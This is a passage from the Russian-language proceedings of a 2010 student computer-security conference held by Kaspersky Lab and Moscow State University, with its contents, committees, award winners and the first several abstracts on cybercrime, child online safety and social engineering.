III Международная студенческая конференция по проблемам компьютерной безопасности III International Student Conference On Computer Security Issues “It Security For The New Generation”
Сборник докладов
Student Conference Papers
Москва, 29-30 марта 2010 г. Moscow, 29-30 March 2010
Содержание: Студенческая конференция по проблемам компьютерной безопасности «IT-Security Conference for the Next Generation» 5 Программный комитет
6
Организационный комитет
6
Итоги конференции
7
1 Секция Современная киберпреступность
9
Кибермошенничество в отношении детей. Как защитить свою семью Бородина К.Г. Соавторы: Трубицина А.В. ....................................................................................................... 9 Автоматизированная информационная система расследования преступлений в сфере компьютерной информации Викторова Т.С. Соавтор: Григорьев Н.Н. ...................................................................................................... 11 Современная киберпреступность. Бондарева М.В. ............................................................................................................................................... 12 Киберпреступность. Мошенничество в онлайн-играх. Моисеева Е.С. ................................................................................................................................................. 15 Социальная инженерия Туякбаев А.Ж................................................................................................................................................... 16 Киберпреступность. Чудмаев А.В. ................................................................................................................................................... 17 Киберпреступность: определение, анализ цифровых данных, способы борьбы Тимохин Е. А. .................................................................................................................................................. 17
2 Секция Компьютерные угрозы. Угрозы для мобильных устройств 19 Организация защиты информации в сетях стандарта IEEE 802.16e Марданова Н. .................................................................................................................................................. 19 Вредоносное мобильное программное обеспечение. Причины заражения и способы борьбы Халитова К.И. .................................................................................................................................................. 20 Мобильная защита данных на флэш-носителях Сергеева А.М................................................................................................................................................... 21 Защита GSM-сетей от возможных атак Идрисова А. ..................................................................................................................................................... 22 Формальная модель оценки убытков предприятия от заражения вредоносными программами Бочарникова М.В. Соавторы: Сапрыкин А.С., Адамов А.С. ........................................................................ 26 Сравнительный анализ программных и аппаратных троянских программ Адамов А.С. ..................................................................................................................................................... 29
3 Секция Криптография, ее актуальность в современном обществе 30 Методы обеспечения целостности и конфиденциальности пользовательской информации в сетях с гарантированным качеством обслуживания Солонская О.И. ............................................................................................................................................... 30 Шифр многозначной замены Кудияров Д. ..................................................................................................................................................... 32 Методика использования ПСКЗИ «Шипка» для построения криптографической системы защиты информации в банковской сфере Макарян А.С. ................................................................................................................................................... 32 Криптографическая защита текстовой информации большого объѐма Остапов Д.С..................................................................................................................................................... 33 Комплексная защита программного обеспечения от несанкционированного использования и копирования Даниелян В. М. Соавтор: Овсепян Е. Р. ....................................................................................................... 33 Обратные стеганографические алгоритмы в задачах обнаружения вредоносных кодов Ершов Д.И. ...................................................................................................................................................... 36
IT security conference for the next generation
2
Алгоритм симметричного криптографического преобразования на базе биграммного шифра «двойная пирамида» Евстратов Л. Г. Соавтор: Чичиков А. А. ........................................................................................................ 37 Криптографические методы защиты информации Пепина М.А. ..................................................................................................................................................... 38 Реконфигурируемая стеганографическая система для безопасного и длительного хранения данных Хачатуров А.Г. ................................................................................................................................................. 39 Алгебраический анализ перспективного блочного алгоритма «Лабиринт» Казимиров А.В. ................................................................................................................................................ 41 Нейросетевой подход к шифрованию информации Канунников Д.С. .............................................................................................................................................. 44
4 Секция Антивирусные технологии. Методы обнаружения предотвращения компьютерных угроз. Средства анализа тестирования современных средств защиты.
и и 46
Разработка модели эпидемии компьютерных вирусов Лыжонков Д.Ю. ................................................................................................................................................ 46 Сетевая безопасность и вредоносное ПО в операционной системе Linux Лабыскин В.Н. Соавтор: Олейник Г.И. .......................................................................................................... 47 Разработка и программная реализация алгоритма защиты компьютера от вредоносных воздействий Шамаева А.А. .................................................................................................................................................. 48 Исследование графических интерфейсов средств антивирусной защиты Гуляев А.И. ...................................................................................................................................................... 52 Защита интерпретируемого кода программных продуктов: методы обфускации и деобфускации Рой К.С............................................................................................................................................................. 52 Эвристические методы детектирования вредоносных программ на основе сценариев Беркович Е.Л. Соавтор: Лотоцкий А.А. ......................................................................................................... 56 Методы деобфускации основанные на анализе частоты появления полезных и мусорных команд Антонов А.Е. .................................................................................................................................................... 57 Способы защиты от autorun-вирусов Саитов М.Н. ..................................................................................................................................................... 58
5 Секция Образовательные проекты (программы обучения) в области компьютерной безопасности
и
методики 59
Учебный проект для студентов высших учебных заведений по противодействию кибертерроризму Бешенцева М.С. соавторы: Сафаргалеева Л.Ф., Фахриев А.В., Бешенцева М.С. ..................................... 59 Учебный курс «Основы технологий информационной безопасности» Мифтахова Л.Х. ............................................................................................................................................... 60 Системы дистанционного обучения Коробулина О.Ю. ............................................................................................................................................ 61 Разработка веб-приложения для изучения и исследования методов защиты информации от несанкционированного воздействия Азизян Н.А. Соавтор: Арутюнян Р.С. ............................................................................................................. 62 Защита компьютера без использования резидентного антивирусного программного обеспечения Чижевский С.В. ................................................................................................................................................ 64 Инициативная деятельность магистров и аспирантов кафедры МОВС в учебном процессе на мех-мате ПГУ Городилов А.Ю. Соавторы: Дураков А.В., Рой К.С., Юрков К.А. ................................................................. 65 Обучение компьютерной безопасности при помощи видеоуроков Адамов А.С. ..................................................................................................................................................... 67
6 Секция Спам. Методы обнаружения содержимого и без него. Фишинг
IT security conference for the next generation
3
спама
с
анализом 68
Алгоритмы выявления спама со словарем Ковалев Д.С. Соавтор: Кренделев С.Ф. ....................................................................................................... 68 Программная реализация модуля по борьбе с фишингом Василега И.А. Соавтор: Люлько И.В. ............................................................................................................. 69 Спам и фишинг. Методы обнаружения и борьбы Файзуллин Р.В................................................................................................................................................. 70
7 Секция Сетевая безопасность
72
Компьютерный вирус как инструмент анализа и модернизации современных средств защиты Ткачев Д. Соавторы: Сидоров М.В., Старцев С.С. ....................................................................................... 72 Обеспечение безопасности сетевой инфраструктуры предприятия. Петлевые атаки Баринов А.Е. .................................................................................................................................................... 73 Исследование уязвимости сетей под управлением MS Windows Server 2003/2008 R2 к NTLMинъекции Телипский Д.А. ................................................................................................................................................ 74
8 Секция Экономические модели информационной безопасности
и
аналитические
аспекты 78
Некоторые подходы к оценке информационных рисков с использованием нечѐтких множеств Шевяхов М.Ю. ................................................................................................................................................. 78 Особенности рынка цифровой дистрибуции: защита информации в рамках сервиса цифровой дистрибуции Дубинин С.А. Соавтор: Маклаков В.И. .......................................................................................................... 79 Обеспечение информационной безопасности в системе «1С:Предприятие 8.1» Султанов Шамиль Ф. Соавтор: Маклаков В.И. ............................................................................................. 79
Авторский указатель:
81
IT security conference for the next generation
4
Студенческая конференция по проблемам компьютерной безопасности «IT-Security Conference for the Next Generation» Цель конференции: Объединить специалистов, молодых ученых, исследователей, изучающих проблемы компьютерной безопасности для обмена опытом, развития инноваций и повышения уровня безопасности в сфере информационных технологий. Обеспечить поддержку молодых ученых для развития исследований в области ИБ. Даты проведения: Заочный тур: 01 ноября 2009 г. – 31 января 2010 г. Подача работ для участия в конференции до 31 января 2009 года Оценка работ программным комитетом: до 25 февраля 2010 года Очный тур: 29-30 марта 2010 г., г. Москва, 29 марта – факультет Вычислительной Математики и Кибрнетики Московского Государственного Университета, 30 марта - офис «Лаборатории Касперского» Организаторы: ЗАО «Лаборатория Касперского», факультет ВМиК. Темы конференции:
Криптография. Актуальность в современном обществе.
Современная киберпреступность.
Антивирусные технологии. Методы обнаружения и предотвращения компьютерных угроз. Средства анализа и тестирования современных средств защиты.
Компьютерные угрозы. Угрозы для мобильных устройств.
Анализ спама и антиспам-технологии. Методы обнаружения спама с анализом содержимого и без него. Фишинг.
Сетевая безопасность.
Образовательные проекты (программы и методики обучения) в области компьютерной безопасности.
Экономические модели и аналитические аспекты информационной безопасности.
Инновационные и патентоспособные антивирусные технологии будущего.
IT security conference for the next generation
5
Программный комитет 1. Касперский Евгений Валентинович, председатель программного комитета, Генеральный директор ЗАО «Лаборатория Касперского». 2. Абрамов Сергей Владимирович, «Лаборатория Касперского».
Руководитель
отдела
управления
качеством
ЗАО
3. Березин Борис Иванович, кандидат физико-математических наук, зам.декана факультета вычислительной математики и кибернетики МГУ им. М.В. Ломоносова 4.
Волков Дмитрий, главный редактор журнала «Открытые системы»
5. Гостев Александр Александрович, Руководитель глобального центра исследований ЗАО «Лаборатория Касперского». 6. Гребенников Николай Андреевич, Директор департамента исследований и разработки ЗАО «Лаборатория Касперского» 7. Гужов Андрей Владимирович, Менеджер проектов разработки корпоративных продуктов ЗАО «Лаборатория Касперского». 8. Ершов Игорь Валерьевич, кандидат физико-математических наук, доцент, кафедра информационных систем и технологий, Новосибирский Государственный Архитектурно-строительный университет 9. Ефимова Светлана Николаевна, Руководитель направления по работе с образовательными учреждениями ЗАО «Лаборатория Касперского» 10. Кащенко Надежда Васильевна, Руководитель отдела по управлению интеллектуальной собственностью ЗАО «Лаборатория Касперского». 11. Мельников Николай Викторович, доктор технических наук, профессор, Информационной безопасности, Российский государственный социальный университет
зав.каф.
12. Минзов Анатолий Степанович, доктор технических наук, профессор, зав.кафедрой «Комплексная безопасность бизнеса», Институт безопасности бизнеса Московского энергетического института (ТУ) 13. Никишин Касперского»
Андрей
Викторович,
Директор
Анти-спам
лаборатории
ЗАО
«Лаборатория
14. Новиков Сергей Валерьевич, Старший специалист глобального центра исследований ЗАО «Лаборатория Касперского». 15. Хаханов Владимир Иванович, профессор, доктор технических наук, декан факультета компьютерной инженерии и управления, Харьковский национальный университет радиоэлектроники. 16. Швецов Никита Валерьевич, Руководитель лаборатории антивирусных исследований ЗАО «Лаборатория Касперского»
Организационный комитет 1. Гулидова Мария Сергеевна, координатор образовательных программ ЗАО «Лаборатория Касперского» (Россия и СНГ). 2. Ефимова Светлана Николаевна, руководитель направления по работе с образовательными учреждениями ЗАО «Лаборатория Касперского». 3. Яшутина Касперского».
Ольга
Александровна,
методист
IT security conference for the next generation
6
образовательных
программ
«Лаборатории
Итоги конференции Лучшие работы заочного тура конференции по результатам оценки программного комитета Криптография, актуальность в современном обществе Aвтор
Солонская Оксана
Учебное учреждение
Город, страна
Сибирский государственный университет телекоммуникаций и информатики (ГОУ ВПО "СибГУТИ")
Новосибирс к, Россия
Наименование работы Методы обеспечения целостности и конфиденциальности пользовательской информации в сетях с гарантированным качеством обслуживания
Современная киберпреступность Aвтор Бородина Кристина, Трубицина Анна
Наименование работы Кибермошенничество в отношении детей. Как защитить свою семью
Учебное учреждение ГОУ ВПО «Магнитогорский государственный университет»
Город, страна Магнитогорс к, Россия
Компьютерные угрозы. Угрозы для мобильных устройств Aвтор Марданова Наталья
Наименование работы
Учебное учреждение
Организация защиты информации в сетях стандарта IEEE 802.16e
Казахский Национальный технический университет им. К. И. Сатпаева
Город, страна Алматы, Казахстан
Анализ спама и антиспам-технологии. Методы обнаружения спама с анализом содержимого и без него. Фишинг. Aвтор Ковалев Дмитрий, Кренделев Сергей Федорович
Наименование работы
Алгоритмы выявления спама со словарем
Учебное учреждение
Новосибирский государственный университет
Город, страна
Новосибирс к, Россия
Антивирусные технологии. Методы обнаружения и предотвращения компьютерных угроз. Средства анализа и тестирования современных средств защиты. Aвтор
Наименование работы
Учебное учреждение
Лыжонков Дмитрий
Разработка модели эпидемии компьютерных вирусов
Военная академия Ракетных войск стратегического назначения имени Петра Великого
Город, страна Москва, Россия
Сетевая безопасность. Aвтор
Наименование работы
Учебное учреждение
IT security conference for the next generation
7
Город, страна
Ткачев Дмитрий
Анализ уровня защиты беспроводных сетей на базе технологии wi-fi города Новосибирска
Институт Вычислительных Технологий СО РАН
Новосибирс к, Россия
Экономические модели и аналитические аспекты информационной безопасности Aвтор
Шевяхов Максим
Наименование работы Некоторые подходы к оценке информационных рисков с использованием нечѐтких множеств
Учебное учреждение ГОУ ВПО Международный Университет природы, общества и человека "Дубна", Институт системного анализа и управления
Город, страна
Дубна, Россия
Образовательные проекты (программы и методики обучения) в области компьютерной безопасности Aвтор Бешенцева Мария Сафаргалее ва Лилия Фахриев Альберт
Наименование работы Учебный проект для студентов высших учебных заведений по противодействию кибертерроризму
Учебное учреждение
ГОУ ВПО «Магнитогорский государственный университет»
IT security conference for the next generation
8
Город, страна
Магнитогорс к, Россия
1
Секция
Современная киберпреступность Кибермошенничество в отношении детей. Как защитить свою семью Бородина К.Г. Соавторы: Трубицина А.В. Магнитогорский Государственный Университет Магнитогорск, Россия
[email protected] На сегодняшний день Интернет перестал быть роскошью, а является неотъемлемой частью повседневной жизни современного человека. Интернет – это довольно-таки дешѐвый и доступный практически для всех социальных слоѐв общества способ общения, развлечения, получения и передачи информации. Неудивительно, что Интернетом пользуются подростки и даже маленькие дети, которым в нашем современном обществе очень часто недостаѐт общения со сверстниками, всѐ больше внимания обращают на чаты, где детей могут поджидать всевозможные мошенники, которые незаметно могут вытянуть сведения личного характера, домашний адрес, телефон, Интернет-адрес и т.д. И это способствует развитию преступной деятельности кибермошенников, которые пользуются их наивностью, доверчивостью и тем, что каждый ребѐнок любопытен и любознателен. И для родителей всѐ острее встаѐт вопрос, как защитить своих детей от опасностей, подстерегающих их в глобальной сети Интернет, и какие методы будут наиболее эффективными в борьбе с ними. Информации о том, как объяснить ребѐнку о кибермошенниках, как предупредить его о том, что он может стать их жертвой, довольно много и рекомендаций по этому поводу достаточно. Основная проблема в том, что родители сами не могут и, скорее всего, не знают о практической стороне обеспечения безопасности своих детей в Интернете. Нужно разработать необходимые меры, которые должны предпринимать родители, чтобы самим полностью контролировать работу своего ребѐнка в Интернете и ограничивать нежелательные действия, как со стороны детей, так и со стороны кибермошенников. Соблюдая все меры предосторожности по обеспечению безопасности своего ребѐнка в Интернете, вы также защищаете всю свою семью от всякого рода преступлений со стороны кибермошенников. Мы анализируем возрастную группу детей 7-8 лет. Дети этого возраста используют электронную почту, посещают сайты и чаты, любят путешествовать по Интернету и играть в сетевые игры, скачивать мелодии и картинки, покупать через Интернет-магазины различного рода товары (не всегда это происходит с разрешения родителей). Зачастую услуги такого рода предлагают кибермошенники. Мы предлагаем несколько советов по защите и безопасности детей при работе с Интернетом: Во-первых, необходимо разграничить Интернет-сайты на разрешѐнные и запрещѐнные для детей. Перед этим нужно проверить подозрительные Интернет-сайты и обратить внимание на те, которые запрашивают личные данные. Взамен таким сайтам, приложив некоторые усилия, можно подобрать аналогичные сайты, не требующие личных данных вашего ребѐнка. Во-вторых, необходимо обеспечить высокий уровень конфиденциальности и безопасности. Кроме блокировки нежелательных сайтов, мы рекомендуем заблокировать и загрузку файлов, предоставляющих угрозу конфиденциальности и безопасности. В-третьих, необходимо наблюдать за тем, на какие сайты заходил или пытался зайти ваш ребѐнок. Даже если вы не можете лично присутствовать при работе вашего ребѐнка в Интернете, у вас есть возможность узнать, что он там делал. В этом вам поможет журнал обозревателя Internet IT security conference for the next generation
9
Explorer. Для этого вам достаточно нажать на панели инструментов кнопку «Журнал». Затем выберите интересующую вас папку и просмотрите сайты, посещаемые вашим ребѐнком. В-четвѐртых, необходимо контролировать общение вашего ребѐнка с незнакомцами в Интернете, которые могут оказаться кибермошенниками. Помимо действий, которые были указаны выше, мы предлагаем воспользоваться ещѐ нашими рекомендациями, чтобы свести к нулю риск попасться на уловки кибермошенников: - Компьютер, подключѐнный к интернету, должен находиться в общих комнатах. - Необходимо устанавливать поисковые машины, которые рассчитаны на детей и имеют фильтры информации. - Необходимо использовать средства блокировки нежелательного материала. - Не позволяйте детям создавать собственные электронные почтовые ящики, а создайте один на всю семью. - Установите фильтры электронной почты, чтобы блокировать письма от нежелательных людей или письма, содержащие конкретные фразы, выражения, слова. - Часто посещаемые сайты следует добавить в список избранных. Это создаст для ребѐнка личную Интернет-среду. - С помощью специальных программ (они встроены в Windows XP) вы можете оградить своего ребѐнка от всплывающих окон с опасной и нежелательной для него информацией. На сегодняшний день нельзя оставлять без внимания проблему современного кибермошенничества по отношению к детям. Это нанесѐт вред не только вашему ребѐнку, но и всей вашей семье. Ведь действия кибермошенников нацелены, в основном, на бюджет семьи ребѐнка, попавшегося на их уловки. Соблюдая все наши советы и рекомендации, следуя нашим инструкциям, вы можете избежать многих уловок кибермошенников. Тем самым вы оберегаете психику ребѐнка и семейный бюджет. Наша работа поможет родителям повысить свой уровень осведомлѐнности в вопросе информационной безопасности ребѐнка и защиты его от кибермошенников. Родители не должны забывать об обучении детей ряду основных правил пользования Интернетом: помимо установки на компьютер, подключѐнный к Интернету, необходимого программного обеспечения, которое будет защищать вашу семью от негативного Интернетсодержимого, они должны разговаривать с детьми об угрозах, подстерегающих их в Интернете. Взрослые должны научить ребѐнка, как действовать в сложной ситуации и обсуждать с ними все установленные ограничения. Учитывая всѐ выше сказанное, родители смогут создать безопасную и в то же время комфортную среду для работы детей в глобальной сети Интернет.
IT security conference for the next generation
10
Автоматизированная информационная система расследования преступлений в сфере компьютерной информации Викторова Т.С. Соавтор: Григорьев Н.Н. Федеральное государственное образовательное учреждение высшего профессионального образования Сибирский Федеральный Университет Институт космических и информационных технологий Красноярск, Россия
[email protected] Одной из причин возникновения преступности в сфере высоких технологий является информационно - технологическое перевооружение предприятий, учреждений и организаций, насыщение их компьютерной техникой, современным программным обеспечением, базами данных Абсолютное большинство юристов слабо ориентируются в области информационных технологий и их специальность не позволяет полностью понять методику расследования преступлений в сфере компьютерной информации. И наоборот, специалисты в области информационных технологий не в состоянии процессуально грамотно оформить доказательство состава преступления. В данный момент в научно-учебной лаборатории «Информационное право» кафедры «Системы искусственного интеллекта» Института космических и информационных технологий Сибирского федерального университета производится разработка автоматизированной системы информационно-аналитического обеспечения расследования преступлений в сфере компьютерной информации для внедрения в органы надзора, следствия и дознания Красноярского края. Особое внимание при проектировании системы уделяется вопросам информационной безопасности, тесно связанным с защитой прав и свобод личности от необоснованного обвинения и осуждения. В автоматизированной системе применяется комплексный подход к осуществлению безопасности охраняемой информации. Дальнейшее развитие проекта позволит создать более емкую и эффективную систему, соответствующую последним достижениям в сфере информационных технологий, которая в значительной мере будет способствовать повышению профессиональности работы следователей и прокуроров – криминалистов Следственного комитета при прокуратуре Российской Федерации.
IT security conference for the next generation
11
Современная киберпреступность. Бондарева М.В. ФГОУ ВПО «Орловский юридический институт МВД России» (Курский филиал) Курск, Россия
[email protected] Аннотация В работе проанализированы возможные угрозы современного кибертерроризма как у нас в стране, так и за рубежом и на основе изучения мирового опыта борьбы с киберпреступностью предложены меры противодействия, которые позволят снизить возможные последствия этого негативного явления. Тезисы работы Цель и задачи работы: показать тенденцию роста компьютерных преступлений; проанализировать отечественную и зарубежную статистику компьютерных преступлений; вскрыть мотивы совершения компьютерных преступлений; создать обобщенный портрет отечественного хакера; оценить вероятные источники угроз безопасности глобальных сетей (по степени потенциальной опасности); выявить характерные черты и особенности компьютерных преступлений на современном этапе; выявить наиболее частые угрозы Интернета и предложить меры противодействия; провести обзор зарубежного уголовного законодательства в области борьбы с кибертерроризмом; предложить меры борьбы с кибертерроризмом; внести предложения в конкретные статьи УК РФ с целью совершенствования законодательства, регламентирующего ответственность за компьютерные преступления на основе уточнения признаков отдельных составов преступлений в сфере компьютерной информации. Актуальность Актуальность работы определяется рядом обстоятельств, характеризующих важность, масштабность и многогранность проблемы. Первое обстоятельство обусловлено социальной значимостью правопорядка, основой которого является, с одной стороны, неуклонное соблюдение и исполнение правовых норм всеми гражданами и государственными органами и, с другой – возможность реализации конституционных прав граждан, общества и государства. Современная информационная сфера обусловливает возникновение принципиально нового вида прав – информационных. Тенденция активного внедрения информационных технологий во все сферы жизни и деятельности человека, наряду с позитивными завоеваниями, ―обогатила‖ криминальную практику новым видом преступлений – киберпреступлениями. Согласно статистическим данным Совета безопасности Российской Федерации, в 2004 г. выявлено более 800 тыс. попыток осуществления компьютерных атак на официальные ресурсы органов государственной власти, при этом более 69 тыс. из них – на официальное Интернетпредставительство Президента России. Второе обстоятельство заключается в том, что российская информационная сфера отличается несовершенством правовых отношений. Такое положение обусловливает высокую степень криминологической уязвимости информационной сферы для недобросовестных участников информационных отношений. По некоторым данным, в России общий ущерб, нанесенный киберпреступностью, только в сфере электронных платежей составляет около 6 млрд. в год. Для сравнения: в США ущерб от киберпреступности составляет ежегодно 5 млрд. долларов, во Франции – около 1 млрд. евро при ежегодном увеличении числа подобных преступлений на 30-40%, в Германии при помощи компьютеров похищается порядка 4 млрд. евро. Диапазон преступников весьма широк: от молодых людей до высококвалифицированных, респектабельных специалистов, занимающих высокое социальное положение.
IT security conference for the next generation
12
Третье обстоятельство состоит в трудностях применения уголовно-правовых норм в следственной и судебной практике. В связи с чем практика официального толкования отдельных норм уголовного права в сфере киберпреступности требует усовершенствования. Указанные обстоятельства, по мнению автора, с убедительностью обосновывают актуальность представленной работы. Основные результаты исследования Показана связь роста объѐмов информации, компьютерных сетей и числа пользователей, упрощение их доступа к циркулирующей по сетям информации с вероятностью хищения или разрушения этой информации. Выявлены факторы, определяющие значимость проблемы защиты информационных ресурсов, в том числе, личных. Проанализирована отечественная и зарубежная статистика роста компьютерных преступлений, приведены данные, характеризующие ежегодный материальный ущерб от компьютерных преступлений. Проанализированы мотивы совершения компьютерных преступлений. На основании анализа уголовных дел по компьютерным преступлениям создан обобщенный портрет отечественного хакера. Выявлены наиболее типичные преступные цели отечественных хакеров при совершении ими компьютерных преступлений. Выявлены из числа штатных сотрудников организаций наиболее потенциальные, кто способен совершить компьютерные преступления. Проведена оценка вероятных источников угроз безопасности глобальных сетей по степени потенциальной опасности. Выявлены цели современного кибертерроризма, ущерб, который он наносит уже сейчас во всем мире и перспективы его развития в будущем. Проведен анализ зарубежного уголовного законодательства в борьбе с кибертерроризмом. Предложены меры противодействия наиболее частым угрозам Интернета. Проанализированы статьи 272, 273 и 274 главы 28 Уголовного кодекса Российской Федерации и предложены поправки в эти статьи с целью совершенствования законодательства, регламентирующего ответственность за компьютерные преступления по Уголовному кодексу Российской Федерации. Предложения по совершенствованию законодательства, регламентирующего ответственность за компьютерные преступления по Уголовному кодексу Российской Федерации, на основе уточнения признаков отдельных составов преступлений в сфере компьютерной информации и круга их субъектов: а) уточнить редакцию ст. 273 Уголовного кодекса Российской Федерации ―Создание, использование и распространение вредоносных программ для ЭВМ‖ введением в диспозицию части 1 указания на цель как обязательный признак субъективной стороны состава преступления; часть 2 указанием на признак ―совершение группой лиц по предварительному сговору или организованной группой‖; часть 2 ст. 274 Уголовного кодекса Российской Федерации ―Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети‖ указанием на признак ―причинение существенного вреда‖; б) дополнить статью 242.1 Уголовного кодекса Российской Федерации ―Изготовление и оборот материалов или предметов с порнографическими изображениями несовершеннолетних‖ частью третьей следующего содержания: ―Производство детской порнографической продукции с целью распространения через ЭВМ, систему ЭВМ или их сеть, предложение или предоставление в пользование, распространение либо приобретение детской порнографии через компьютерную систему для себя или для другого лица, - наказывается лишением свободы на срок от десяти до двенадцати лет‖; в) дополнить ст. 20 Уголовного кодекса Российской Федерации ―Возраст, с которого наступает уголовная ответственность‖ указанием на ст. 273 Уголовного кодекса Российской Федерации ―Создание, использование и распространение вредоносных программ для ЭВМ‖; г) дополнить гл. 28 раздела ІХ Уголовного кодекса Российской Федерации самостоятельными составами, предусматривающими уголовную ответственность за мошенничество с использованием компьютерных технологий и подлог с использованием компьютерных технологий. Что касается международно-правовой защиты интеллектуальной собственности, а также авторских прав на материалы, распространяемые по сети Интернет, то должны быть выработаны международные правовые нормы, устанавливающие ответственность за компьютерные преступления. IT security conference for the next generation
13
В Интернете пользователь не только получает возможность доступа к различным информационным ресурсам, но и создает канал для доступа к своему компьютеру. Ответственности за помещаемую в Интернет информацию фактически не несет ни автор, ни провайдер. Никто не несет ответственности и за попытки несанкционированного доступа к сетевым информационным ресурсам. Все вопросы защиты собственной информации относятся к компетенции пользователя. Необходима разработка международных правовых положений, устанавливающих ответственность за несанкционированный доступ к ресурсам Интернета. В соответствии с требованиями Резолюции 428 Консультативной Ассамблеи Совета Европы (раздел С) приоритет отдается уважению и защите частной жизни в ущерб праву на свободу информации. Стратегия международного сотрудничества в сфере противодействия компьютерной преступности и приоритетные направления еѐ реализации, в том числе: межгосударственные соглашения; организация межгосударственной оперативно-розыскной деятельности; принятие межгосударственного регламента и совершенствование интеграционных процессов в рамках межгосударственных организаций; обоснование необходимости разработки и принятия соответствующей комплексной межгосударственной программы. Практическое применение в сфере компьютерной безопасности. Результаты, полученные в работе, могут быть использованы в практической деятельности отдельных пользователей и организаций для предупреждения угроз и снижения возможных потерь от действий современной киберпреступности, а также для совершенствования системы комплексной защиты информации в компьютерных сетях и научных целях.
IT security conference for the next generation
14
Киберпреступность. Мошенничество в онлайн-играх. Моисеева Е.С. ГОУ СПО (ССУЗ) «Рузаевский политехнический техникум» Рузаевка, Россия
[email protected] Главной тенденцией последних лет является нацеленность хакеров на извлечение нелегальной прибыли из создания и распространения вредоносных программ. С развитием Интернета появился отдельный класс компьютерных игр — игр, в которые можно играть не только локально на своем компьютере или с партнером на одной клавиатуре, а с тысячами и десятками тысяч игроков со всей планеты. Онлайн-игра — компьютерная игра, использующая постоянное соединение с Интернетом. Развитие вредоносных программ для онлайн-игр является прямым следствием развития самих онлайн-игр и игровой индустрии в целом. Сегодня кража виртуальной собственности и игровых персонажей — это хорошо налаженный бизнес. И если в начале еще не существовало каких-то универсальных алгоритмов для воровства паролей к онлайн-играм, то сейчас они появились. В силу своей простоты (похитителю не требуются особые технические навыки) и высокой прибыльности использование вредоносных программ для кражи паролей к онлайн-играм получило наибольшее распространение. В настоящее время в мире появляется восемь-девять новых червей для кражи паролей к онлайн-играм в день и пять-шесть «игровых» троянцев в час. При этом «игровые» вредоносные программы последнего поколения уже сравнимы по сложности с многофункциональными троянцами, занимающимися построением зомби-сетей. Игроки онлайн-игр постоянно находятся под прицелом у злоумышленников. Разработчики игр пытаются оградить пользователей от злоумышленников, вводя новые механизмы авторизации/аутентификации пользователей, криптографические протоколы, всевозможные патчи игровых клиентов — вплоть до изменения системы ценностей в игровом процессе. Антивирусные компании тоже пытаются оградить своих клиентов от кражи паролей к онлайн-играм, оперативно предоставляя базы уже известных вредоносных программ, добавляя в антивирусы новые эвристики и поведенческие признаки программ, осуществляющих неправомерный доступ к игровым клиентам.
IT security conference for the next generation
15
Социальная инженерия Туякбаев А.Ж. Костанайский государственный университет имени Ахмета Байтурсынова Костанай, Республика Казахстан
[email protected] В ходе борьбы с техническими проблемами информационной безопасности так называемая «белая сторона Силы» - компании, специализирующиеся на обеспечении информационной безопасности, достигли существенных успехов. Сейчас вредоносному коду все сложнее становится повысить привилегии в системе (скрытая установка драйверов, включение своих модулей в автозапуск и т.д.), осуществить кражу данных, незаметно перевести деньги на счет злоумышленников. Поэтому для выполнения деструктивных и шпионских действий вирусописатели все активнее используют технологии, основанные на психологическом влиянии на сознание пользователя, так называемую социальную инженерию. Успешность применения социальной инженерии обусловлена доступностью современных информационных технологий широкому кругу слабо подготовленных пользователей (например, детей, домохозяек) и расширению перечня сервисов, при использовании которых раскрытие конфиденциальной информации является потенциально опасным или морально (материально) значимым для человека. Примерами могут являться кражи паролей к сервисам Web 2.0 (социальным сетям, блогам), паролей к популярным онлайн-играм, хищение финансовой информации – параметров авторизации и аутентификации сервисов интернет-банкинга, электронных платежных систем. Также методы социальной инженерии снискали популярность за счет относительной простоты использования – нет необходимости в создании сложной системы «обхода» защитных средств – при удачной психологической атаке пользователь все сделает сам: введет данные, добавит программу-шпиона в список исключений антивирусного продукта и т.д. В данной работе описываются основные моменты, связанные с развитием такого явления, как социальная инженерия: Основные методы и техники социальной инженерии. Способы обхода «защиты» человека. Человеческие качества, которыми чаще всего пользуются социальные инженеры. Доверчивость, отзывчивость, жадность и жажда превосходства. Примеры использования социальной инженерии, встречающиеся на каждом шагу. Примеры текстов и писем. Бесплатное получение ключей на платные продукты методами социальной инженерии. Классические и новые методы обмана. Причины, по которым удается обойти подозрения пользователей. Статистика спам-рассылок. Как же с этим бороться, если все так плохо? Примеры того, как делать не стоит. Мнения экспертов по данному вопросу. Как можно убедиться в том, что собеседник действительно тот, за кого себя выдает. Почему телефонная проверка – это не всегда надежно.
IT security conference for the next generation
16
Киберпреступность. Чудмаев А.В. ГОУ СПО (ССУЗ) «Рузаевский политехнический техникум» Рузаевка, Россия
[email protected] Данная работа выполнена по теме: «Киберпреступность». Сегодня эта тема очень актуальна, т.к. без персонального компьютера и компьютерных технологий не обходится ни одна сфера жизнедеятельности человека. Большую роль эти технологии играют и в банковском деле. А банки всегда притягивали к себе внимание преступного мира. Поэтому компьютерные технологии в области денежного обращения стали подвергаться атакам и взломам со стороны хакеров – киберпреступников. Орудиями преступления хакеров является не банальный лом или отмычка, а сложные компьютерные программы – вирусы, которые мошенники всевозможным образом внедряют в программу банкомата, что приводит к сбою работы и потерям денежных средств с банковских карт клиентов. Поэтому в работе рассмотрена работа одного из видов банкоматов, методы его взлома и пути предотвращения данного вида преступной деятельности.
Киберпреступность: определение, анализ цифровых данных, способы борьбы Тимохин Е. А. Башкирский Государственный Аграрный Университет Уфа, Россия
[email protected] Компьютер стал частью жизни современного человека, все больше и больше людей в свое свободное время находятся в виртуальном мире или же, как правильно говорить, в сети Интернет. Освоение виртуального пространства приводит пользователя к «встрече» с опасностями, одной из которых может быть потеря своих личных или даже конфиденциальных данных. В момент, когда пользователь находится в сети, злоумышленники могут легко гулять по его компьютеру, скачивать данные, заражать системы и даже, если у пользователя есть встроенное видеоустройство, наблюдать за ним. А электронные платежи и большой объем обмена информации является самым лакомым кусочком, который больше всего привлекает злоумышленников. В общем, можно сказать, что преступность, возникшая в виртуальном мире благодаря новым высоким технологиям, во многом отражает реальный мир. Новый вид преступлений получи и новое название – киберпреступность. В подавляющем большинстве случаев такие преступления имеют финансовую составляющую — деньги в Интернете отбираются у жертв или путем воровства, или путем мошенничества, иногда с исльзованием обоих методов. Киберпреступность становится бизнесом и никак иначе это не назвать, возможность легко заработать огромные деньги дома, сидя за столом у компьютера, очень привлекает злоумышленников Проблема киберпреступности особо актуальна в настоящее время. Сегодня это явление является значительно более серьезной опасностью, чем 10 лет назад, в связи с использованием новейших информационных технологий, а также через расширенную уязвимость индустриального общества. Мы живем в эпоху информационного общества, когда компьютеры и телекоммуникационные системы охватывают все сферы жизнедеятельности человека и государства. Но человечество, поставив себе на 